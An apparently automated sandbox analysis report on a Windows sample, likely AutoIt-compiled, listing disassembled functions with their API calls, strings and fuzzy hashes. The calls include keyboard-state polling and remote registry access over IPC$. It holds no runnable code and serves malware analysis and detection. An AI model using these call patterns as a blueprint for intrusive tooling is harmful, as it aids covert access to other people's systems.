Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 4ccbdcb3020c421e37c193c3fbce464846677a2170c265ca3efb17a4f2586ae1
Instruction ID: 694f8ad79656eedf3deab1de4e1c262765d9210d373e0b9391b4d738489960a2
Opcode Fuzzy Hash: 4ccbdcb3020c421e37c193c3fbce464846677a2170c265ca3efb17a4f2586ae1
Instruction Fuzzy Hash: 1D318E71905228BFDB359B91EC88EFFBB7CEF45715F000466F805F2240DA309E499AA0

Function 00E2EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00E2EFCB

Part of subcall function 00DDF215: timeGetTime.WINMM(?,?,00E2EFEB), ref: 00DDF219

Sleep.KERNEL32(0000000A), ref: 00E2EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00E2F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E2F03E
SetActiveWindow.USER32 ref: 00E2F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E2F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00E2F08A
Sleep.KERNEL32(000000FA), ref: 00E2F095
IsWindow.USER32 ref: 00E2F0A1
EndDialog.USER32(00000000), ref: 00E2F0B2

Strings

BUTTON, xrefs: 00E2F030

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 905ce26f0efa451840816216e5e6446c5ede72a2e01e2c4a45b55e36189b2dc8
Instruction ID: cc33c92ae04e3657234758ab3fee426130d0a3016c6016a6fb215797bbc6a304
Opcode Fuzzy Hash: 905ce26f0efa451840816216e5e6446c5ede72a2e01e2c4a45b55e36189b2dc8
Instruction Fuzzy Hash: 7C215075604325BFE725AF32FC89E267BA9F74974AB001437F506B2372DB718C488662

Function 00E2F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E2F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E2F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2F39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E2F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E2F3BE

Strings

play PlayMe, xrefs: 00E2F3B9
close PlayMe, xrefs: 00E2F385, 00E2F3B2
open , xrefs: 00E2F323
play PlayMe wait, xrefs: 00E2F3A8
alias PlayMe, xrefs: 00E2F34D
status PlayMe mode, xrefs: 00E2F36F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 141a2d6057197f18727d1aa7f6852f19b24e3a1a0b8c590a46376925372d1057
Instruction ID: 3f19f178b75448423badd1819165ecbd5129b1e4ca5d7038fa461083a364be9b
Opcode Fuzzy Hash: 141a2d6057197f18727d1aa7f6852f19b24e3a1a0b8c590a46376925372d1057
Instruction Fuzzy Hash: 16119131A5026A79D720B265DC4AFFF6A7CEBD1B00F51143AB40AF30D1EAA09D45C6B1

Function 00DF2FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DF3007

Part of subcall function 00DF2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4), ref: 00DF2D4E
Part of subcall function 00DF2D38: GetLastError.KERNEL32(00E91DC4,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4,00E91DC4), ref: 00DF2D60

_free.LIBCMT ref: 00DF3013
_free.LIBCMT ref: 00DF301E
_free.LIBCMT ref: 00DF3029
_free.LIBCMT ref: 00DF3034
_free.LIBCMT ref: 00DF303F
_free.LIBCMT ref: 00DF304A
_free.LIBCMT ref: 00DF3055
_free.LIBCMT ref: 00DF3060
_free.LIBCMT ref: 00DF306E

Strings

&, xrefs: 00DF2FFE

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: &
API String ID: 776569668-2586148540
Opcode ID: 265ea472854097d60b0d64559d88fd114227057643a2e65b56b3486df79d4aca
Instruction ID: cb1dfb34642a1f782c9b04c02a5bd1aff20d8da548e8250bebe66c7d1c2e6573
Opcode Fuzzy Hash: 265ea472854097d60b0d64559d88fd114227057643a2e65b56b3486df79d4aca
Instruction Fuzzy Hash: 9111467651010CAFCB01EF55CD42DFD3B65EF05350B9685A5BA089B122DA32DF919BB0

Function 00E2A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00E2A9D9
SetKeyboardState.USER32(?), ref: 00E2AA44
GetAsyncKeyState.USER32(000000A0), ref: 00E2AA64
GetKeyState.USER32(000000A0), ref: 00E2AA7B
GetAsyncKeyState.USER32(000000A1), ref: 00E2AAAA
GetKeyState.USER32(000000A1), ref: 00E2AABB
GetAsyncKeyState.USER32(00000011), ref: 00E2AAE7
GetKeyState.USER32(00000011), ref: 00E2AAF5
GetAsyncKeyState.USER32(00000012), ref: 00E2AB1E
GetKeyState.USER32(00000012), ref: 00E2AB2C
GetAsyncKeyState.USER32(0000005B), ref: 00E2AB55
GetKeyState.USER32(0000005B), ref: 00E2AB63

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 57fee5696dd4a0a176b8f1304f8e91ac8dc279a372ad6fba2590948894bed6a1
Instruction ID: b7ca61d8f68962cb7b3107a9d59cb0a3f38087f0adca653db6c1e8bcf7b454cb
Opcode Fuzzy Hash: 57fee5696dd4a0a176b8f1304f8e91ac8dc279a372ad6fba2590948894bed6a1
Instruction Fuzzy Hash: 1B511B609047A82BFB35EB60A851BEABFF55F01344F0C55A9C5C23B1C2DA549B8CC763

Function 00E2662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00E26649
GetWindowRect.USER32(00000000,?), ref: 00E26662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E266C0
GetDlgItem.USER32(?,00000002), ref: 00E266D0
GetWindowRect.USER32(00000000,?), ref: 00E266E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E26736
GetDlgItem.USER32(?,000003E9), ref: 00E26744
GetWindowRect.USER32(00000000,?), ref: 00E26756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E26798
GetDlgItem.USER32(?,000003EA), ref: 00E267AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E267C1
InvalidateRect.USER32(?,00000000,00000001), ref: 00E267CE

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: a7c367ac3052e9032e5c877282979d09b1bd9998232a0d52b1028b5ce9e5c1c3
Instruction ID: a3bf7a9d2493c8168bade8db295fc898461860ade6efbbae4a94c26148771c6d
Opcode Fuzzy Hash: a7c367ac3052e9032e5c877282979d09b1bd9998232a0d52b1028b5ce9e5c1c3
Instruction Fuzzy Hash: B7512F71A00319AFDF18CF69DD89AAEBBB5FB48315F108629F51AF7290D7709D048B50

Function 00DC2128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00DC2234: GetWindowLongW.USER32(?,000000EB), ref: 00DC2242

GetSysColor.USER32(0000000F), ref: 00DC2152

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 0389d2467d9f7e7977cc08a11e5aba6a65462274685e0bbfc8e5371acb031829
Instruction ID: bd9f7932ca3d207b525659bfe4b3f734db826948649dad86f19b05711f26c516
Opcode Fuzzy Hash: 0389d2467d9f7e7977cc08a11e5aba6a65462274685e0bbfc8e5371acb031829
Instruction Fuzzy Hash: F141D271104741AFDB349F399C48FB93769EB42335F184609FAA2AB2E1C7318D82DB20

Function 00DC13A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00E028D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E028EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E028FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E02912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E02933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DC11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E02942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E0295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DC11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E0296E

Strings

(, xrefs: 00E02885

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: (
API String ID: 1268354404-2063206799
Opcode ID: ee48ce58d2afd0f8ea6f39a4c31b9f98ad3957a8ae0b1d8559b8ad93a72e0233
Instruction ID: 01ce43aea4e1d631662c6899efd71f40eb193bdfbe1e6ee868ac8ac015258577
Opcode Fuzzy Hash: ee48ce58d2afd0f8ea6f39a4c31b9f98ad3957a8ae0b1d8559b8ad93a72e0233
Instruction Fuzzy Hash: AB515934A0030AAFDB28DF25CC45FAA7BE5EB89714F10451DFA42A72E1D770E994DB60

Function 00E5955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

Part of subcall function 00DC19CD: GetCursorPos.USER32(?), ref: 00DC19E1
Part of subcall function 00DC19CD: ScreenToClient.USER32(00000000,?), ref: 00DC19FE
Part of subcall function 00DC19CD: GetAsyncKeyState.USER32(00000001), ref: 00DC1A23
Part of subcall function 00DC19CD: GetAsyncKeyState.USER32(00000002), ref: 00DC1A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00E595C7
ImageList_EndDrag.COMCTL32 ref: 00E595CD
ReleaseCapture.USER32 ref: 00E595D3
SetWindowTextW.USER32(?,00000000), ref: 00E5966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E59681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00E5975B

Strings

(, xrefs: 00E59728
(, xrefs: 00E5956D
@GUI_DRAGFILE, xrefs: 00E596F6
@GUI_DROPID, xrefs: 00E596AD

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$($(
API String ID: 1924731296-3832140312
Opcode ID: 5fde4bf8db1850296798129adf0f1d163b1fac0dc4b8ce205820d1fa9f8404f6
Instruction ID: ce33317bef85f3491f632d1ed1f352d243b4533405643798ec7acba8401ead55
Opcode Fuzzy Hash: 5fde4bf8db1850296798129adf0f1d163b1fac0dc4b8ce205820d1fa9f8404f6
Instruction Fuzzy Hash: DC51B170104300AFDB14EF21CC56FAA77E4FB88715F40191EF996A72E2DB709908CB62

Function 00E2A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00E10D31,00000001,0000138C,00000001,00000000,00000001,?,00E3EEAE,00E92430), ref: 00E2A091
LoadStringW.USER32(00000000,?,00E10D31,00000001), ref: 00E2A09A

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00E10D31,00000001,0000138C,00000001,00000000,00000001,?,00E3EEAE,00E92430,?), ref: 00E2A0BC
LoadStringW.USER32(00000000,?,00E10D31,00000001), ref: 00E2A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E2A1E0

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00E2A1C4
^ ERROR, xrefs: 00E2A175
Line %d:, xrefs: 00E2A11A
Error: , xrefs: 00E2A197
Line %d (File "%s"):, xrefs: 00E2A109

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: c63962524f15e8a121304e3163f6b8969b102fc5fe68c010786544739b2e31ea
Instruction ID: c227463e2293bcc346be2d4138f4fdf82ba5ccf7a0cff4d1f61d9c2718ca8def
Opcode Fuzzy Hash: c63962524f15e8a121304e3163f6b8969b102fc5fe68c010786544739b2e31ea
Instruction Fuzzy Hash: 1B41FB7280021AABCB15EBE0DD46EEEB779EF14311F500469B506B2092EB65AF49CB71

Function 00E20FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E21093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E210AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E210CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E210F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E2111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E21128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E2112D

Strings

\IPC$, xrefs: 00E21075
SOFTWARE\Classes\, xrefs: 00E20FFF
\CLSID, xrefs: 00E21015

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 426177a98244125b0a0203fb3c638c7cb6ee0940af827e32c4f1bb6176f4eee4
Instruction ID: bae8a2476ccc28085ad5d3c4f757c882c0576f2f3402ff44acb7bbba41d6e691
Opcode Fuzzy Hash: 426177a98244125b0a0203fb3c638c7cb6ee0940af827e32c4f1bb6176f4eee4
Instruction Fuzzy Hash: 9D41F872C10229AFCB25EBA4EC45EEEB779FF14754F004169E905B31A0EB719E45CB60

Function 00E54A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E54AD9
CreateCompatibleDC.GDI32(00000000), ref: 00E54AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E54AF3
SelectObject.GDI32(00000000,00000000), ref: 00E54AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00E54B06
DeleteDC.GDI32(00000000), ref: 00E54B10
GetWindowLongW.USER32(?,000000EC), ref: 00E54B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00E54B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00E54B3C

Strings

static, xrefs: 00E54A71

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 23f2439c4940319daf29c5e35d87e9a83d03919bb8802e5dcf79a7233d1993d5
Instruction ID: 9ac32a1ee6df61850e62dfee27f45ace12b6a2e652b60953d02c4dc0c9f7a5f4
Opcode Fuzzy Hash: 23f2439c4940319daf29c5e35d87e9a83d03919bb8802e5dcf79a7233d1993d5
Instruction Fuzzy Hash: F2317C71100209AFDF229F65CC08FDA3BA9EF0932AF110611FA14B20A0D735D894DBA4

Function 00E2D11F Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00E2D1BE

Strings

question, xrefs: 00E2D177
`+, xrefs: 00E2D1CA, 00E2D1CD
\+, xrefs: 00E2D151
\+, xrefs: 00E2D1CF
warning, xrefs: 00E2D1A7
info, xrefs: 00E2D15F
stop, xrefs: 00E2D18F
blank, xrefs: 00E2D140

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: IconLoad
String ID: \+$\+$`+$blank$info$question$stop$warning
API String ID: 2457776203-3382907240
Opcode ID: 41a9324751183f1833bfc01b08b2e04989130a732a63eaa73a7cfbf8211485b1
Instruction ID: 680ca1b2344db5749ffd67d7e7c1b9a79788c01b84486938f2f5eca65ab976f9
Opcode Fuzzy Hash: 41a9324751183f1833bfc01b08b2e04989130a732a63eaa73a7cfbf8211485b1
Instruction Fuzzy Hash: 85113A3164D326BEE7046B15FC82EAA77ACDF05765B20102AF749B65C1D7F19A108270

Function 00E4468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E446B9
CoInitialize.OLE32(00000000), ref: 00E446E7
CoUninitialize.OLE32 ref: 00E446F1
_wcslen.LIBCMT ref: 00E4478A
GetRunningObjectTable.OLE32(00000000,?), ref: 00E4480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00E44932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00E4496B
CoGetObject.OLE32(?,00000000,00E60B64,?), ref: 00E4498A
SetErrorMode.KERNEL32(00000000), ref: 00E4499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E44A21
VariantClear.OLEAUT32(?), ref: 00E44A35

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: fea59e29f4c05fa4a252c70aaa59c50d47558af4b5e4a1afc5fcaa7b001cf73a
Instruction ID: b334e1542d6a24495f0309e45805f262dd1fdc21d9a3fe1e1e34104440fd5725
Opcode Fuzzy Hash: fea59e29f4c05fa4a252c70aaa59c50d47558af4b5e4a1afc5fcaa7b001cf73a
Instruction Fuzzy Hash: 93C147B16083019FC704DF68D884A6BB7E9FF89748F10591DF989AB291DB31ED05CB62

Function 00E384DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00E38538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E385D4
